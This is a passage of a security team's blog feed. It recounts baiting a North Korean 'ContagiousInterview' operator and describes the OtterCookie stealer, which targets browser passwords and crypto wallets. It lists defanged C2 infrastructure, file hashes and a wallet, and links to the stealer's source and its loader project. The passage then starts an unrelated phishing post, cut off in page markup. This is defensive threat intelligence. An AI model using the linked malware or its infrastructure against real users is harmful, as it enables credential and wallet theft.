target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZeuL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZeuL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png 424w, https://substackcdn.com/image/fetch/$s_!ZeuL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png 848w, https://substackcdn.com/image/fetch/$s_!ZeuL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png 1272w, https://substackcdn.com/image/fetch/$s_!ZeuL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZeuL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png" width="1456" height="948" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:948,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:646066,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZeuL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png 424w, https://substackcdn.com/image/fetch/$s_!ZeuL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png 848w, https://substackcdn.com/image/fetch/$s_!ZeuL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png 1272w, https://substackcdn.com/image/fetch/$s_!ZeuL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e8995d3-c11a-4529-8fd4-fa535cbbc059_1611x1049.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This not-so-playful otter works as a <strong><a href="https://www.malwarebytes.com/blog/threats/info-stealers">Stealer</a>-type malware,</strong> targeting <strong>browser password managers and extensions</strong> (specifically <strong>crypto wallets</strong>), and is also deployed in the <strong>ContagiousInterview</strong> campaign.</p><p>We <em>tried catching</em> the <strong>Otter</strong>, and we did. We have the infrastructure, the sample, the involved accounts, and their communication script.</p><p>It was time to contact our &#8216;employer&#8217; to update them on the progress of the job.</p><div><hr></div><h2>Interview with the Chollima</h2><p>I went back to LinkedIn and told my employer that I had two ways of implementing the patch and would like to have a short meeting to discuss them. <strong>He bought it</strong> and wanted me to <strong>run the sample during the call</strong> to see the results.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Y4lz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Y4lz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png 424w, https://substackcdn.com/image/fetch/$s_!Y4lz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png 848w, https://substackcdn.com/image/fetch/$s_!Y4lz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png 1272w, https://substackcdn.com/image/fetch/$s_!Y4lz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Y4lz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png" width="1456" height="897" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:897,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1347855,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Y4lz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png 424w, https://substackcdn.com/image/fetch/$s_!Y4lz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png 848w, https://substackcdn.com/image/fetch/$s_!Y4lz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png 1272w, https://substackcdn.com/image/fetch/$s_!Y4lz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbfe092bf-9f71-4a7e-952e-dea4cbad2845_3088x1902.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And so, I started recording my screen, waiting in silence for the wild <strong>Chollima</strong> to set foot in the trap&#8212;and it did, with an anime profile picture and under the name of &#8220;<strong>0xdori DFO</strong>&#8221;.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!WIju!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!WIju!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png 424w, https://substackcdn.com/image/fetch/$s_!WIju!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png 848w, https://substackcdn.com/image/fetch/$s_!WIju!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png 1272w, https://substackcdn.com/image/fetch/$s_!WIju!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!WIju!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png" width="652" height="152" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:152,&quot;width&quot;:652,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:38907,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!WIju!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png 424w, https://substackcdn.com/image/fetch/$s_!WIju!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png 848w, https://substackcdn.com/image/fetch/$s_!WIju!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png 1272w, https://substackcdn.com/image/fetch/$s_!WIju!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6ba13d3f-b203-46c2-b019-5c099bc0c08e_652x152.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>I expected to see a <em>majestic winged horse</em> stomping bravely over the scene, but instead, I ended up with a <em>scared little pony fleeing</em>. </p><p>But, I&#8217;ll let you judge that for yourself&#8230;</p><div class="pullquote"><p><em>The following video has been edited (and the Threat Actor muted) to avoid disclosing certain indicators. <br>We may upload a full version in the future.</em></p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;60f2e61b-e7af-4642-8b63-bb32aba8327b&quot;,&quot;duration&quot;:null}"></div></div><p>The pony pranced away in panic, without saying another word. </p><p>Being gentlemen, I thought we could at least exchange <a href="https://en.wikipedia.org/wiki/The_Long_Goodbye_(novel)">a proper farewell</a>, but I was promptly blocked.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_AUe!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_AUe!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!_AUe!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!_AUe!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!_AUe!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_AUe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png" width="1456" height="948" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:948,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:2129709,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_AUe!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!_AUe!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!_AUe!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!_AUe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4aa23215-7045-401f-b58a-9c8c646e1ac9_3222x2098.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We claimed the game and called it a day. </p><p>But, my friends, <strong>the hunting season never ends</strong>&#8230;</p><div><hr></div><h2>Indicators of Compromise</h2><pre><code>IPv4:135.181.123.177
Domain:chainlink-api-v3.cloud
URL:http[:]//chainlink-api-v3[.]cloud/api/service/token/56e15ef3b5e5f169fc063f8d3e88288e
URL:http[:]//chainlink-api-v3[.]cloud/api/
URL:https[:]//bitbucket.org/0xhpenvynb/mvp_gamba/downloads/
SHA256:aa0d64c39680027d56a32ffd4ceb7870b05bdd497a3a7c902f23639cb3b43ba1
SHA256:071aff6941dc388516d8ca0215b757f9bee7584dea6c27c4c6993da192df1ab9
SHA256:486f305bdd09a3ef6636e92c6a9e01689b8fa977ed7ffb898453c43d47b5386d
SHA256:ec234419fc512baded05f7b29fefbf12f898a505f62c43d3481aed90fef33687
FileName:0xhpenvynb-mvp_gamba-6b10f2e9dd85.zip
SOLWallet:V2grJiwjs25iJYqumbHyKo5MTK7SFqZSdmoRaj8QWb9</code></pre><div><hr></div><h2>Resources &amp; References</h2><ul><li><p><a href="https://otx.alienvault.com/pulse/67f968e54901170c0ddabf3c">Original Intelligence Pulse on LevelBlue OTX</a></p></li><li><p><a href="https://justpaste.it/ottercookie-obfuscated">OtterCookie source code (obfuscated)</a></p></li><li><p><a href="https://justpaste.it/ottercookie-deobfuscated">OtterCookie source code (deobfuscated)</a></p></li><li><p><a href="https://drive.proton.me/urls/5JJ099CTQC#LGxpdOBOuwAp">Fake project (loader) source code</a></p></li></ul><div><hr></div><h2>Acknowledgements &amp; Contributors</h2><p>This work would not be possible without the contribution from dedicated <strong>Lazarus</strong> <strong>Agents</strong> who surrendered their cyber-weapons to the <strong>Quetzal Team</strong>. We honor them here:</p><p>&#10060; <strong><s>Edward</s></strong> from <strong>Labyrinth Chollima. </strong>Fell during the <strong><a href="https://tmpout.sh/3/27.html">QRLog</a></strong> campaign, in which we discovered the <strong><a href="https://thehackernews.com/2023/08/north-korean-hackers-deploy-new.html">QRLog</a></strong><a href="https://thehackernews.com/2023/08/north-korean-hackers-deploy-new.html"> malware</a>.</p><p>&#10060; <strong><s>Nargis</s></strong> from <strong>Velvet Chollima.</strong> Fell during the <strong>DreamJob</strong> campaign, in which we captured the <strong><a href="https://quetzal.bitso.com/p/docks">Docks</a></strong><a href="https://quetzal.bitso.com/p/docks"> malware</a>.</p><p>&#10060; <strong><s>Artyom</s></strong> from <strong>Velvet Chollima.</strong> Fell during the <strong>ContagiousInterview</strong> campaign, in which -alongside another team- we discovered the <strong><a href="https://www.nknews.org/pro/north-korea-hackers-go-after-business-executives-in-latest-info-stealing-scheme/">ChaoticCapybara</a></strong> malware.</p><p>&#10060; <strong><s>Wilton</s></strong> from <strong>Famous Chollima. </strong>Fell during the <strong>ContagiousInterview</strong> campaign, in which we captured the <strong>OtterCookie</strong> malware.</p><p>Comment <strong>[F]</strong> to pay respects and don&#8217;t cry for them: <strong>they fell bravely against the best.</strong></p>]]></content:encoded></item><item><title><![CDATA[The Invoice Illusion: When Phishers Send You a Bill You’d Never Wish to Pay]]></title><description><![CDATA[See what I did there?]]></description><link>https://quetzal.bitso.com/p/the-invoice-illusion-when-phishers</link><guid isPermaLink="false">https://quetzal.bitso.com/p/the-invoice-illusion-when-phishers</guid><dc:creator><![CDATA[Jose]]></dc:creator><pubDate>Thu, 13 Feb 2025 18:00:49 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!C76h!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!C76h!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!C76h!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic 424w, https://substackcdn.com/image/fetch/$s_!C76h!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic 848w, https://substackcdn.com/image/fetch/$s_!C76h!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic 1272w, https://substackcdn.com/image/fetch/$s_!C76h!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!C76h!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic" width="457" height="457" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:457,&quot;bytes&quot;:67575,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!C76h!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic 424w, https://substackcdn.com/image/fetch/$s_!C76h!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic 848w, https://substackcdn.com/image/fetch/$s_!C76h!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic 1272w, https://substackcdn.com/image/fetch/$s_!C76h!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F258226cf-3e2e-47bf-943c-4edf783ce932_1024x1024.heic 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" 